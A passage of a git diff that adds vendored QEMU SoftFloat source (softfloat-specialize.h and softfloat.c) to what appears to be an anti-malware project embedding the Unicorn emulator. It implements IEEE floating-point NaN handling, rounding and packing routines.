+/*---------------------------------------------------------------------------- +| Returns a quiet NaN if the quadruple-precision floating point value `a' is +| a signaling NaN; otherwise returns `a'. +*----------------------------------------------------------------------------*/ + +float128 float128_maybe_silence_nan( float128 a ) +{ + if (float128_is_signaling_nan(a)) { +#if SNAN_BIT_IS_ONE +# if defined(TARGET_MIPS) || defined(TARGET_SH4) || defined(TARGET_UNICORE32) + a.low = float128_default_nan_low; + a.high = float128_default_nan_high; +# else +# error Rules for silencing a signaling NaN are target-specific +# endif +#else + a.high |= LIT64( 0x0000800000000000 ); + return a; +#endif + } + return a; +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the quadruple-precision floating-point NaN +| `a' to the canonical NaN format. If `a' is a signaling NaN, the invalid +| exception is raised. +*----------------------------------------------------------------------------*/ + +static commonNaNT float128ToCommonNaN( float128 a STATUS_PARAM) +{ + commonNaNT z; + + if ( float128_is_signaling_nan( a ) ) float_raise( float_flag_invalid STATUS_VAR); + z.sign = a.high>>63; + shortShift128Left( a.high, a.low, 16, &z.high, &z.low ); + return z; +} + +/*---------------------------------------------------------------------------- +| Returns the result of converting the canonical NaN `a' to the quadruple- +| precision floating-point format. +*----------------------------------------------------------------------------*/ + +static float128 commonNaNToFloat128( commonNaNT a STATUS_PARAM) +{ + float128 z; + + if ( STATUS(default_nan_mode) ) { + z.low = float128_default_nan_low; + z.high = float128_default_nan_high; + return z; + } + + shift128Right( a.high, a.low, 16, &z.high, &z.low ); + z.high |= ( ( (uint64_t) a.sign )<<63 ) | LIT64( 0x7FFF000000000000 ); + return z; +} + +/*---------------------------------------------------------------------------- +| Takes two quadruple-precision floating-point values `a' and `b', one of +| which is a NaN, and returns the appropriate NaN result. If either `a' or +| `b' is a signaling NaN, the invalid exception is raised. +*----------------------------------------------------------------------------*/ + +static float128 propagateFloat128NaN( float128 a, float128 b STATUS_PARAM) +{ + flag aIsQuietNaN, aIsSignalingNaN, bIsQuietNaN, bIsSignalingNaN; + flag aIsLargerSignificand; + + aIsQuietNaN = float128_is_quiet_nan( a ); + aIsSignalingNaN = float128_is_signaling_nan( a ); + bIsQuietNaN = float128_is_quiet_nan( b ); + bIsSignalingNaN = float128_is_signaling_nan( b ); + + if ( aIsSignalingNaN | bIsSignalingNaN ) float_raise( float_flag_invalid STATUS_VAR); + + if ( STATUS(default_nan_mode) ) { + a.low = float128_default_nan_low; + a.high = float128_default_nan_high; + return a; + } + + if (lt128(a.high<<1, a.low, b.high<<1, b.low)) { + aIsLargerSignificand = 0; + } else if (lt128(b.high<<1, b.low, a.high<<1, a.low)) { + aIsLargerSignificand = 1; + } else { + aIsLargerSignificand = (a.high < b.high) ? 1 : 0; + } + + if (pickNaN(aIsQuietNaN, aIsSignalingNaN, bIsQuietNaN, bIsSignalingNaN, + aIsLargerSignificand)) { + return float128_maybe_silence_nan(b); + } else { + return float128_maybe_silence_nan(a); + } +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/fpu/softfloat.c b/ai_anti_malware/unicorn/unicorn-master/qemu/fpu/softfloat.c new file mode 100644 index 0000000..d1031ba --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/fpu/softfloat.c @@ -0,0 +1,7579 @@ +/* + * QEMU float support + * + * Derived from SoftFloat. + */ + +/*============================================================================ + +This C source file is part of the SoftFloat IEC/IEEE Floating-point Arithmetic +Package, Release 2b. + +Written by John R. Hauser. This work was made possible in part by the +International Computer Science Institute, located at Suite 600, 1947 Center +Street, Berkeley, California 94704. Funding was partially provided by the +National Science Foundation under grant MIP-9311980. The original version +of this code was written as part of a project to build a fixed-point vector +processor in collaboration with the University of California at Berkeley, +overseen by Profs. Nelson Morgan and John Wawrzynek. More information +is available through the Web page `http://www.cs.berkeley.edu/~jhauser/ +arithmetic/SoftFloat.html'. + +THIS SOFTWARE IS DISTRIBUTED AS IS, FOR FREE. Although reasonable effort has +been made to avoid it, THIS SOFTWARE MAY CONTAIN FAULTS THAT WILL AT TIMES +RESULT IN INCORRECT BEHAVIOR. USE OF THIS SOFTWARE IS RESTRICTED TO PERSONS +AND ORGANIZATIONS WHO CAN AND WILL TAKE FULL RESPONSIBILITY FOR ALL LOSSES, +COSTS, OR OTHER PROBLEMS THEY INCUR DUE TO THE SOFTWARE, AND WHO FURTHERMORE +EFFECTIVELY INDEMNIFY JOHN HAUSER AND THE INTERNATIONAL COMPUTER SCIENCE +INSTITUTE (possibly via similar legal warning) AGAINST ALL LOSSES, COSTS, OR +OTHER PROBLEMS INCURRED BY THEIR CUSTOMERS AND CLIENTS DUE TO THE SOFTWARE. + +Derivative works are acceptable, even for commercial purposes, so long as +(1) the source code for the derivative work includes prominent notice that +the work is derivative, and (2) the source code includes prominent notice with +these four paragraphs for those parts of this code that are retained. + +=============================================================================*/ + +/* softfloat (and in particular the code in softfloat-specialize.h) is + * target-dependent and needs the TARGET_* macros. + */ +#include "config.h" + +#include "fpu/softfloat.h" + +/* We only need stdlib for abort() */ +#include <stdlib.h> + +/*---------------------------------------------------------------------------- +| Primitive arithmetic functions, including multi-word arithmetic, and +| division and square root approximations. (Can be specialized to target if +| desired.) +*----------------------------------------------------------------------------*/ +#include "softfloat-macros.h" + +/*---------------------------------------------------------------------------- +| Functions and definitions to determine: (1) whether tininess for underflow +| is detected before or after rounding by default, (2) what (if anything) +| happens when exceptions are raised, (3) how signaling NaNs are distinguished +| from quiet NaNs, (4) the default generated quiet NaNs, and (5) how NaNs +| are propagated from function inputs to output. These details are target- +| specific. +*----------------------------------------------------------------------------*/ +#include "softfloat-specialize.h" + +/*---------------------------------------------------------------------------- +| Returns the fraction bits of the half-precision floating-point value `a'. +*----------------------------------------------------------------------------*/ + +static inline uint32_t extractFloat16Frac(float16 a) +{ + return float16_val(a) & 0x3ff; +} + +/*---------------------------------------------------------------------------- +| Returns the exponent bits of the half-precision floating-point value `a'. +*----------------------------------------------------------------------------*/ + +static inline int_fast16_t extractFloat16Exp(float16 a) +{ + return (float16_val(a) >> 10) & 0x1f; +} + +/*---------------------------------------------------------------------------- +| Returns the sign bit of the single-precision floating-point value `a'. +*----------------------------------------------------------------------------*/ + +static inline flag extractFloat16Sign(float16 a) +{ + return float16_val(a)>>15; +} + +/*---------------------------------------------------------------------------- +| Takes a 64-bit fixed-point value `absZ' with binary point between bits 6 +| and 7, and returns the properly rounded 32-bit integer corresponding to the +| input. If `zSign' is 1, the input is negated before being converted to an +| integer. Bit 63 of `absZ' must be zero. Ordinarily, the fixed-point input +| is simply rounded to an integer, with the inexact exception raised if the +| input cannot be represented exactly as an integer. However, if the fixed- +| point input is too large, the invalid exception is raised and the largest +| positive or negative integer is returned. +*----------------------------------------------------------------------------*/ + +static int32 roundAndPackInt32( flag zSign, uint64_t absZ STATUS_PARAM) +{ + int8 roundingMode; + flag roundNearestEven; + int8 roundIncrement, roundBits; + int32_t z; + + roundingMode = STATUS(float_rounding_mode); + roundNearestEven = ( roundingMode == float_round_nearest_even ); + switch (roundingMode) { + case float_round_nearest_even: + case float_round_ties_away: + roundIncrement = 0x40; + break; + case float_round_to_zero: + roundIncrement = 0; + break; + case float_round_up: + roundIncrement = zSign ? 0 : 0x7f; + break; + case float_round_down: + roundIncrement = zSign ? 0x7f : 0; + break; + default: + roundIncrement = 0; + float_raise(float_flag_invalid STATUS_VAR); + break; + } + roundBits = absZ & 0x7F; + absZ = ( absZ + roundIncrement )>>7; + absZ &= ~ ( ( ( roundBits ^ 0x40 ) == 0 ) & roundNearestEven ); + z = (int32_t)absZ; + if ( zSign && (z != 0x80000000)) z = - z; + if ( ( absZ>>32 ) || ( z && ( ( z < 0 ) ^ zSign ) ) ) { + float_raise( float_flag_invalid STATUS_VAR); + return zSign ? (int32_t) 0x80000000 : 0x7FFFFFFF; + } + if ( roundBits ) STATUS(float_exception_flags) |= float_flag_inexact; + return z; + +} + +/*---------------------------------------------------------------------------- +| Takes the 128-bit fixed-point value formed by concatenating `absZ0' and +| `absZ1', with binary point between bits 63 and 64 (between the input words), +| and returns the properly rounded 64-bit integer corresponding to the input. +| If `zSign' is 1, the input is negated before being converted to an integer. +| Ordinarily, the fixed-point input is simply rounded to an integer, with +| the inexact exception raised if the input cannot be represented exactly as +| an integer. However, if the fixed-point input is too large, the invalid +| exception is raised and the largest positive or negative integer is +| returned. +*----------------------------------------------------------------------------*/ + +static int64 roundAndPackInt64( flag zSign, uint64_t absZ0, uint64_t absZ1 STATUS_PARAM) +{ + int8 roundingMode; + flag roundNearestEven, increment; + int64_t z; + + roundingMode = STATUS(float_rounding_mode); + roundNearestEven = ( roundingMode == float_round_nearest_even ); + switch (roundingMode) { + case float_round_nearest_even: + case float_round_ties_away: + increment = ((int64_t) absZ1 < 0); + break; + case float_round_to_zero: + increment = 0; + break; + case float_round_up: + increment = !zSign && absZ1; + break; + case float_round_down: + increment = zSign && absZ1; + break; + default: + increment = 0; + float_raise(float_flag_invalid STATUS_VAR); + break; + } + if ( increment ) { + ++absZ0; + if ( absZ0 == 0 ) goto overflow; + absZ0 &= ~ ( ( (uint64_t) ( absZ1<<1 ) == 0 ) & roundNearestEven ); + } + z = absZ0; + if ( zSign && z != 0x8000000000000000ULL ) z = - z; + if ( z && ( ( z < 0 ) ^ zSign ) ) { + overflow: + float_raise( float_flag_invalid STATUS_VAR); + return + zSign ? (int64_t) LIT64( 0x8000000000000000 ) + : LIT64( 0x7FFFFFFFFFFFFFFF ); + } + if ( absZ1 ) STATUS(float_exception_flags) |= float_flag_inexact; + return z; + +} + +/*---------------------------------------------------------------------------- +| Takes the 128-bit fixed-point value formed by concatenating `absZ0' and +| `absZ1', with binary point between bits 63 and 64 (between the input words), +| and returns the properly rounded 64-bit unsigned integer corresponding to the +| input. Ordinarily, the fixed-point input is simply rounded to an integer, +| with the inexact exception raised if the input cannot be represented exactly +| as an integer. However, if the fixed-point input is too large, the invalid +| exception is raised and the largest unsigned integer is returned. +*----------------------------------------------------------------------------*/ + +static int64 roundAndPackUint64(flag zSign, uint64_t absZ0, + uint64_t absZ1 STATUS_PARAM) +{ + int8 roundingMode; + flag roundNearestEven, increment; + + roundingMode = STATUS(float_rounding_mode); + roundNearestEven = (roundingMode == float_round_nearest_even); + switch (roundingMode) { + case float_round_nearest_even: + case float_round_ties_away: + increment = ((int64_t)absZ1 < 0); + break; + case float_round_to_zero: + increment = 0; + break; + case float_round_up: + increment = !zSign && absZ1; + break; + case float_round_down: + increment = zSign && absZ1; + break; + default: + increment = 0; + float_raise(float_flag_invalid STATUS_VAR); + break; + } + if (increment) { + ++absZ0; + if (absZ0 == 0) { + float_raise(float_flag_invalid STATUS_VAR); + return LIT64(0xFFFFFFFFFFFFFFFF); + } + absZ0 &= ~(((uint64_t)(absZ1<<1) == 0) & roundNearestEven); + } + + if (zSign && absZ0) { + float_raise(float_flag_invalid STATUS_VAR); + return 0; + } + + if (absZ1) { + STATUS(float_exception_flags) |= float_flag_inexact; + } + return absZ0; +} + +/*---------------------------------------------------------------------------- +| Returns the fraction bits of the single-precision floating-point value `a'. +*----------------------------------------------------------------------------*/ + +static inline uint32_t extractFloat32Frac( float32 a ) +{ + + return float32_val(a) & 0x007FFFFF; + +} + +/*---------------------------------------------------------------------------- +| Returns the exponent bits of the single-precision floating-point value `a'. +*----------------------------------------------------------------------------*/ + +static inline int_fast16_t extractFloat32Exp(float32 a) +{ + + return ( float32_val(a)>>23 ) & 0xFF; + +} + +/*---------------------------------------------------------------------------- +| Returns the sign bit of the single-precision floating-point value `a'. +*----------------------------------------------------------------------------*/ + +static inline flag extractFloat32Sign( float32 a ) +{ + + return float32_val(a)>>31; + +} + +/*---------------------------------------------------------------------------- +| If `a' is denormal and we are in flush-to-zero mode then set the +| input-denormal exception and return zero. Otherwise just return the value. +*----------------------------------------------------------------------------*/ +float32 float32_squash_input_denormal(float32 a STATUS_PARAM) +{ + if (STATUS(flush_inputs_to_zero)) { + if (extractFloat32Exp(a) == 0 && extractFloat32Frac(a) != 0) { + float_raise(float_flag_input_denormal STATUS_VAR); + return make_float32(float32_val(a) & 0x80000000); + } + } + return a; +} + +/*---------------------------------------------------------------------------- +| Normalizes the subnormal single-precision floating-point value represented +| by the denormalized significand `aSig'. The normalized exponent and +| significand are stored at the locations pointed to by `zExpPtr' and +| `zSigPtr', respectively. +*----------------------------------------------------------------------------*/ + +static void + normalizeFloat32Subnormal(uint32_t aSig, int_fast16_t *zExpPtr, uint32_t *zSigPtr) +{ + int8 shiftCount; + + shiftCount = countLeadingZeros32( aSig ) - 8; + *zSigPtr = aSig<<shiftCount; + *zExpPtr = 1 - shiftCount; + +} + +/*---------------------------------------------------------------------------- +| Packs the sign `zSign', exponent `zExp', and significand `zSig' into a +| single-precision floating-point value, returning the result. After being +| shifted into the proper positions, the three fields are simply added +| together to form the result. This means that any integer portion of `zSig' +| will be added into the exponent. Since a properly normalized significand +| will have an integer portion equal to 1, the `zExp' input should be 1 less +| than the desired result exponent whenever `zSig' is a complete, normalized +| significand. +*----------------------------------------------------------------------------*/ + +static inline float32 packFloat32(flag zSign, int_fast16_t zExp, uint32_t zSig) +{ + + return make_float32( + ( ( (uint32_t) zSign )<<31 ) + ( ( (uint32_t) zExp )<<23 ) + zSig); + +} + +/*---------------------------------------------------------------------------- +| Takes an abstract floating-point value having sign `zSign', exponent `zExp', +| and significand `zSig', and returns the proper single-precision floating- +| point value corresponding to the abstract input. Ordinarily, the abstract +| value is simply rounded and packed into the single-precision format, with +| the inexact exception raised if the abstract input cannot be represented +| exactly. However, if the abstract value is too large, the overflow and +| inexact exceptions are raised and an infinity or maximal finite value is +| returned. If the abstract value is too small, the input value is rounded to +| a subnormal number, and the underflow and inexact exceptions are raised if +| the abstract input cannot be represented exactly as a subnormal single- +| precision floating-point number. +| The input significand `zSig' has its binary point between bits 30 +| and 29, which is 7 bits to the left of the usual location. This shifted +| significand must be normalized or smaller. If `zSig' is not normalized, +| `zExp' must be 0; in that case, the result returned is a subnormal number, +| and it must not require rounding. In the usual case that `zSig' is +| normalized, `zExp' must be 1 less than the ``true'' floating-point exponent. +| The handling of underflow and overflow follows the IEC/IEEE Standard for +| Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +static float32 roundAndPackFloat32(flag zSign, int_fast16_t zExp, uint32_t zSig STATUS_PARAM) +{ + int8 roundingMode; + flag roundNearestEven; + int8 roundIncrement = 0, roundBits; + flag isTiny; + + roundingMode = STATUS(float_rounding_mode); + roundNearestEven = ( roundingMode == float_round_nearest_even ); + switch (roundingMode) { + case float_round_nearest_even: + case float_round_ties_away: + roundIncrement = 0x40; + break; + case float_round_to_zero: + roundIncrement = 0; + break; + case float_round_up: + roundIncrement = zSign ? 0 : 0x7f; + break; + case float_round_down: + roundIncrement = zSign ? 0x7f : 0; + break; + default: + float_raise(float_flag_invalid STATUS_VAR); + break; + } + roundBits = zSig & 0x7F; + if ( 0xFD <= (uint16_t) zExp ) { + if ( ( 0xFD < zExp ) + || ( ( zExp == 0xFD ) + && ( (int32_t) ( zSig + roundIncrement ) < 0 ) ) + ) { + float_raise( float_flag_overflow | float_flag_inexact STATUS_VAR); + return packFloat32( zSign, 0xFF, - ( roundIncrement == 0 )); + } + if ( zExp < 0 ) { + if (STATUS(flush_to_zero)) { + float_raise(float_flag_output_denormal STATUS_VAR); + return packFloat32(zSign, 0, 0); + } + isTiny = + ( STATUS(float_detect_tininess) == float_tininess_before_rounding ) + || ( zExp < -1 ) + || ( zSig + roundIncrement < 0x80000000 ); + shift32RightJamming( zSig, - zExp, &zSig ); + zExp = 0; + roundBits = zSig & 0x7F; + if ( isTiny && roundBits ) float_raise( float_flag_underflow STATUS_VAR); + } + } + if ( roundBits ) STATUS(float_exception_flags) |= float_flag_inexact; + zSig = ( zSig + roundIncrement )>>7; + zSig &= ~ ( ( ( roundBits ^ 0x40 ) == 0 ) & roundNearestEven ); + if ( zSig == 0 ) zExp = 0; + return packFloat32( zSign, zExp, zSig ); + +} + +/*---------------------------------------------------------------------------- +| Takes an abstract floating-point value having sign `zSign', exponent `zExp', +| and significand `zSig', and returns the proper single-precision floating- +| point value corresponding to the abstract input. This routine is just like +| `roundAndPackFloat32' except that `zSig' does not have to be normalized. +| Bit 31 of `zSig' must be zero, and `zExp' must be 1 less than the ``true'' +| floating-point exponent. +*----------------------------------------------------------------------------*/ + +static float32 + normalizeRoundAndPackFloat32(flag zSign, int_fast16_t zExp, uint32_t zSig STATUS_PARAM) +{ + int8 shiftCount; + + shiftCount = countLeadingZeros32( zSig ) - 1; + return roundAndPackFloat32( zSign, zExp - shiftCount, zSig<<shiftCount STATUS_VAR); + +} + +/*---------------------------------------------------------------------------- +| Returns the fraction bits of the double-precision floating-point value `a'. +*----------------------------------------------------------------------------*/ + +static inline uint64_t extractFloat64Frac( float64 a ) +{ + + return float64_val(a) & LIT64( 0x000FFFFFFFFFFFFF ); + +} + +/*---------------------------------------------------------------------------- +| Returns the exponent bits of the double-precision floating-point value `a'. +*----------------------------------------------------------------------------*/ + +static inline int_fast16_t extractFloat64Exp(float64 a) +{ + + return ( float64_val(a)>>52 ) & 0x7FF; + +} + +/*---------------------------------------------------------------------------- +| Returns the sign bit of the double-precision floating-point value `a'. +*----------------------------------------------------------------------------*/ + +static inline flag extractFloat64Sign( float64 a ) +{ + + return float64_val(a)>>63; + +} + +/*---------------------------------------------------------------------------- +| If `a' is denormal and we are in flush-to-zero mode then set the +| input-denormal exception and return zero. Otherwise just return the value. +*----------------------------------------------------------------------------*/ +float64 float64_squash_input_denormal(float64 a STATUS_PARAM) +{ + if (STATUS(flush_inputs_to_zero)) { + if (extractFloat64Exp(a) == 0 && extractFloat64Frac(a) != 0) { + float_raise(float_flag_input_denormal STATUS_VAR); + return make_float64(float64_val(a) & (1ULL << 63)); + } + } + return a; +} + +/*---------------------------------------------------------------------------- +| Normalizes the subnormal double-precision floating-point value represented +| by the denormalized significand `aSig'. The normalized exponent and +| significand are stored at the locations pointed to by `zExpPtr' and +| `zSigPtr', respectively. +*----------------------------------------------------------------------------*/ + +static void + normalizeFloat64Subnormal(uint64_t aSig, int_fast16_t *zExpPtr, uint64_t *zSigPtr) +{ + int8 shiftCount; + + shiftCount = countLeadingZeros64( aSig ) - 11; + *zSigPtr = aSig<<shiftCount; + *zExpPtr = 1 - shiftCount; + +} + +/*---------------------------------------------------------------------------- +| Packs the sign `zSign', exponent `zExp', and significand `zSig' into a +| double-precision floating-point value, returning the result. After being +| shifted into the proper positions, the three fields are simply added +| together to form the result. This means that any integer portion of `zSig' +| will be added into the exponent. Since a properly normalized significand +| will have an integer portion equal to 1, the `zExp' input should be 1 less +| than the desired result exponent whenever `zSig' is a complete, normalized +| significand. +*----------------------------------------------------------------------------*/ + +static inline float64 packFloat64(flag zSign, int_fast16_t zExp, uint64_t zSig) +{ + + return make_float64( + ( ( (uint64_t) zSign )<<63 ) + ( ( (uint64_t) zExp )<<52 ) + zSig); + +} + +/*---------------------------------------------------------------------------- +| Takes an abstract floating-point value having sign `zSign', exponent `zExp', +| and significand `zSig', and returns the proper double-precision floating- +| point value corresponding to the abstract input. Ordinarily, the abstract +| value is simply rounded and packed into the double-precision format, with +| the inexact exception raised if the abstract input cannot be represented +| exactly. However, if the abstract value is too large, the overflow and +| inexact exceptions are raised and an infinity or maximal finite value is +| returned. If the abstract value is too small, the input value is rounded +| to a subnormal number, and the underflow and inexact exceptions are raised +| if the abstract input cannot be represented exactly as a subnormal double- +| precision floating-point number. +| The input significand `zSig' has its binary point between bits 62 +| and 61, which is 10 bits to the left of the usual location. This shifted +| significand must be normalized or smaller. If `zSig' is not normalized, +| `zExp' must be 0; in that case, the result returned is a subnormal number, +| and it must not require rounding. In the usual case that `zSig' is +| normalized, `zExp' must be 1 less than the ``true'' floating-point exponent. +| The handling of underflow and overflow follows the IEC/IEEE Standard for +| Binary Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +static float64 roundAndPackFloat64(flag zSign, int_fast16_t zExp, uint64_t zSig STATUS_PARAM) +{ + int8 roundingMode; + flag roundNearestEven; + int_fast16_t roundIncrement = 0, roundBits; + flag isTiny; + + roundingMode = STATUS(float_rounding_mode); + roundNearestEven = ( roundingMode == float_round_nearest_even ); + switch (roundingMode) { + case float_round_nearest_even: + case float_round_ties_away: + roundIncrement = 0x200; + break; + case float_round_to_zero: + roundIncrement = 0; + break; + case float_round_up: + roundIncrement = zSign ? 0 : 0x3ff; + break; + case float_round_down: + roundIncrement = zSign ? 0x3ff : 0; + break; + default: + float_raise(float_flag_invalid STATUS_VAR); + break; + } + roundBits = zSig & 0x3FF; + if ( 0x7FD <= (uint16_t) zExp ) { + if ( ( 0x7FD < zExp ) + || ( ( zExp == 0x7FD ) + && ( (int64_t) ( zSig + roundIncrement ) < 0 ) ) + ) { + float_raise( float_flag_overflow | float_flag_inexact STATUS_VAR); + return packFloat64( zSign, 0x7FF, - ( roundIncrement == 0 )); + } + if ( zExp < 0 ) { + if (STATUS(flush_to_zero)) { + float_raise(float_flag_output_denormal STATUS_VAR); + return packFloat64(zSign, 0, 0); + } + isTiny = + ( STATUS(float_detect_tininess) == float_tininess_before_rounding ) + || ( zExp < -1 ) + || ( zSig + roundIncrement < LIT64( 0x8000000000000000 ) ); + shift64RightJamming( zSig, - zExp, &zSig ); + zExp = 0; + roundBits = zSig & 0x3FF; + if ( isTiny && roundBits ) float_raise( float_flag_underflow STATUS_VAR); + } + } + if ( roundBits ) STATUS(float_exception_flags) |= float_flag_inexact; + zSig = ( zSig + roundIncrement )>>10; + zSig &= ~ ( ( ( roundBits ^ 0x200 ) == 0 ) & roundNearestEven ); + if ( zSig == 0 ) zExp = 0; + return packFloat64( zSign, zExp, zSig ); + +} + +/*---------------------------------------------------------------------------- +| Takes an abstract floating-point value having sign `zSign', exponent `zExp', +| and significand `zSig', and returns the proper double-precision floating- +| point value corresponding to the abstract input. This routine is just like +| `roundAndPackFloat64' except that `zSig' does not have to be normalized. +| Bit 63 of `zSig' must be zero, and `zExp' must be 1 less than the ``true'' +| floating-point exponent. +*----------------------------------------------------------------------------*/ + +static float64 + normalizeRoundAndPackFloat64(flag zSign, int_fast16_t zExp, uint64_t zSig STATUS_PARAM) +{ + int8 shiftCount; + + shiftCount = countLeadingZeros64( zSig ) - 1; + return roundAndPackFloat64( zSign, zExp - shiftCount, zSig<<shiftCount STATUS_VAR); + +} + +/*---------------------------------------------------------------------------- +| Returns the fraction bits of the extended double-precision floating-point +| value `a'. +*----------------------------------------------------------------------------*/ + +static inline uint64_t extractFloatx80Frac( floatx80 a ) +{ + + return a.low; + +} + +/*---------------------------------------------------------------------------- +| Returns the exponent bits of the extended double-precision floating-point +| value `a'. +*----------------------------------------------------------------------------*/ + +static inline int32 extractFloatx80Exp( floatx80 a ) +{ + + return a.high & 0x7FFF; + +} + +/*---------------------------------------------------------------------------- +| Returns the sign bit of the extended double-precision floating-point value +| `a'. +*----------------------------------------------------------------------------*/ + +static inline flag extractFloatx80Sign( floatx80 a ) +{ + + return a.high>>15; + +} + +/*---------------------------------------------------------------------------- +| Normalizes the subnormal extended double-precision floating-point value +| represented by the denormalized significand `aSig'. The normalized exponent +| and significand are stored at the locations pointed to by `zExpPtr' and +| `zSigPtr', respectively. +*----------------------------------------------------------------------------*/ + +static void + normalizeFloatx80Subnormal( uint64_t aSig, int32 *zExpPtr, uint64_t *zSigPtr ) +{ + int8 shiftCount; + + shiftCount = countLeadingZeros64( aSig ) & 0x3f; + *zSigPtr = aSig<<shiftCount; + *zExpPtr = 1 - shiftCount; + +} + +/*---------------------------------------------------------------------------- +| Packs the sign `zSign', exponent `zExp', and significand `zSig' into an +| extended double-precision floating-point value, returning the result. +*----------------------------------------------------------------------------*/ + +static inline floatx80 packFloatx80( flag zSign, int32 zExp, uint64_t zSig ) +{ + floatx80 z; + + z.low = zSig; + z.high = ( ( (uint16_t) zSign )<<15 ) + zExp; + return z; + +} + +/*---------------------------------------------------------------------------- +| Takes an abstract floating-point value having sign `zSign', exponent `zExp', +| and extended significand formed by the concatenation of `zSig0' and `zSig1', +| and returns the proper extended double-precision floating-point value +| corresponding to the abstract input. Ordinarily, the abstract value is +| rounded and packed into the extended double-precision format, with the +| inexact exception raised if the abstract input cannot be represented +| exactly. However, if the abstract value is too large, the overflow and +| inexact exceptions are raised and an infinity or maximal finite value is +| returned. If the abstract value is too small, the input value is rounded to +| a subnormal number, and the underflow and inexact exceptions are raised if +| the abstract input cannot be represented exactly as a subnormal extended +| double-precision floating-point number. +| If `roundingPrecision' is 32 or 64, the result is rounded to the same +| number of bits as single or double precision, respectively. Otherwise, the +| result is rounded to the full precision of the extended double-precision +| format. +| The input significand must be normalized or smaller. If the input +| significand is not normalized, `zExp' must be 0; in that case, the result +| returned is a subnormal number, and it must not require rounding. The +| handling of underflow and overflow follows the IEC/IEEE Standard for Binary +| Floating-Point Arithmetic. +*----------------------------------------------------------------------------*/ + +static floatx80 + roundAndPackFloatx80( + int8 roundingPrecision, flag zSign, int32 zExp, uint64_t zSig0, uint64_t zSig1 + STATUS_PARAM) +{ + int8 roundingMode; + flag roundNearestEven, increment = 0, isTiny; + int64 roundIncrement, roundMask, roundBits; + + roundingMode = STATUS(float_rounding_mode); + roundNearestEven = ( roundingMode == float_round_nearest_even ); + if ( roundingPrecision == 80 ) goto precision80; + if ( roundingPrecision == 64 ) { + roundIncrement = LIT64( 0x0000000000000400 ); + roundMask = LIT64( 0x00000000000007FF ); + } + else if ( roundingPrecision == 32 ) { + roundIncrement = LIT64( 0x0000008000000000 ); + roundMask = LIT64( 0x000000FFFFFFFFFF ); + } + else { + goto precision80; + } + zSig0 |= ( zSig1 != 0 ); + switch (roundingMode) { + case float_round_nearest_even: + case float_round_ties_away: + break; + case float_round_to_zero: + roundIncrement = 0; + break; + case float_round_up: + roundIncrement = zSign ? 0 : roundMask; + break; + case float_round_down: + roundIncrement = zSign ? roundMask : 0; + break; + default: + float_raise(float_flag_invalid STATUS_VAR); + break; + } + roundBits = zSig0 & roundMask; + if ( 0x7FFD <= (uint32_t) ( zExp - 1 ) ) { + if ( ( 0x7FFE < zExp ) + || ( ( zExp == 0x7FFE ) && ( zSig0 + roundIncrement < zSig0 ) ) + ) { + goto overflow; + } + if ( zExp <= 0 ) { + if (STATUS(flush_to_zero)) { + float_raise(float_flag_output_denormal STATUS_VAR); + return packFloatx80(zSign, 0, 0); + } + isTiny = + ( STATUS(float_detect_tininess) == float_tininess_before_rounding ) + || ( zExp < 0 ) + || ( zSig0 <= zSig0 + roundIncrement ); + shift64RightJamming( zSig0, 1 - zExp, &zSig0 ); + zExp = 0; + roundBits = zSig0 & roundMask; + if ( isTiny && roundBits ) float_raise( float_flag_underflow STATUS_VAR); + if ( roundBits ) STATUS(float_exception_flags) |= float_flag_inexact; + zSig0 += roundIncrement; + if ( (int64_t) zSig0 < 0 ) zExp = 1; + roundIncrement = roundMask + 1; + if ( roundNearestEven && ( roundBits<<1 == roundIncrement ) ) { + roundMask |= roundIncrement; + } + zSig0 &= ~ roundMask; + return packFloatx80( zSign, zExp, zSig0 ); + } + } + if ( roundBits ) STATUS(float_exception_flags) |= float_flag_inexact; + zSig0 += roundIncrement; + if ( zSig0 < (uint64_t)roundIncrement ) { + ++zExp; + zSig0 = LIT64( 0x8000000000000000 ); + } + roundIncrement = roundMask + 1; + if ( roundNearestEven && ( roundBits<<1 == roundIncrement ) ) { + roundMask |= roundIncrement; + } + zSig0 &= ~ roundMask; + if ( zSig0 == 0 ) zExp = 0; + return packFloatx80( zSign, zExp, zSig0 ); + precision80: + switch (roundingMode) { + case float_round_nearest_even: + case float_round_ties_away: + increment = ((int64_t)zSig1 < 0); + break; + case float_round_to_zero: + increment = 0; + break; + case float_round_up: + increment = !zSign && zSig1; + break; + case float_round_down: + increment = zSign && zSig1; + break; + default: + float_raise(float_flag_invalid STATUS_VAR); + break; + } + if ( 0x7FFD <= (uint32_t) ( zExp - 1 ) ) { + if ( ( 0x7FFE < zExp ) + || ( ( zExp == 0x7FFE ) + && ( zSig0 == LIT64( 0xFFFFFFFFFFFFFFFF ) ) + && increment + ) + ) { + roundMask = 0; + overflow: + float_raise( float_flag_overflow | float_flag_inexact STATUS_VAR); + if ( ( roundingMode == float_round_to_zero ) + || ( zSign && ( roundingMode == float_round_up ) ) + || ( ! zSign && ( roundingMode == float_round_down ) ) + ) { + return packFloatx80( zSign, 0x7FFE, ~ roundMask ); + } + return packFloatx80( zSign, 0x7FFF, LIT64( 0x8000000000000000 ) ); + } + if ( zExp <= 0 ) { + isTiny = + ( STATUS(float_detect_tininess) == float_tininess_before_rounding ) + || ( zExp < 0 ) + || ! increment + || ( zSig0 < LIT64( 0xFFFFFFFFFFFFFFFF ) ); + shift64ExtraRightJamming( zSig0, zSig1, 1 - zExp, &zSig0, &zSig1 ); + zExp = 0; + if ( isTiny && zSig1 ) float_raise( float_flag_underflow STATUS_VAR); + if ( zSig1 ) STATUS(float_exception_flags) |= float_flag_inexact; + switch (roundingMode) { + case float_round_nearest_even: + case float_round_ties_away: + increment = ((int64_t)zSig1 < 0); + break; + case float_round_to_zero: + increment = 0; + break; + case float_round_up: + increment = !zSign && zSig1; + break; + case float_round_down: + increment = zSign && zSig1; + break; + default: + float_raise(float_flag_invalid STATUS_VAR); + break; + } + if ( increment ) { + ++zSig0; + zSig0 &= + ~ ( ( (uint64_t) ( zSig1<<1 ) == 0 ) & roundNearestEven ); + if ( (int64_t) zSig0 < 0 ) zExp = 1; + } + return packFloatx80( zSign, zExp, zSig0 ); + } + } + if ( zSig1 ) STATUS(float_exception_flags) |= float_flag_inexact; + if ( increment ) { + ++zSig0; + if ( zSig0 == 0 ) { + ++zExp; + zSig0 = LIT64( 0x8000000000000000 ); + } + else { + zSig0 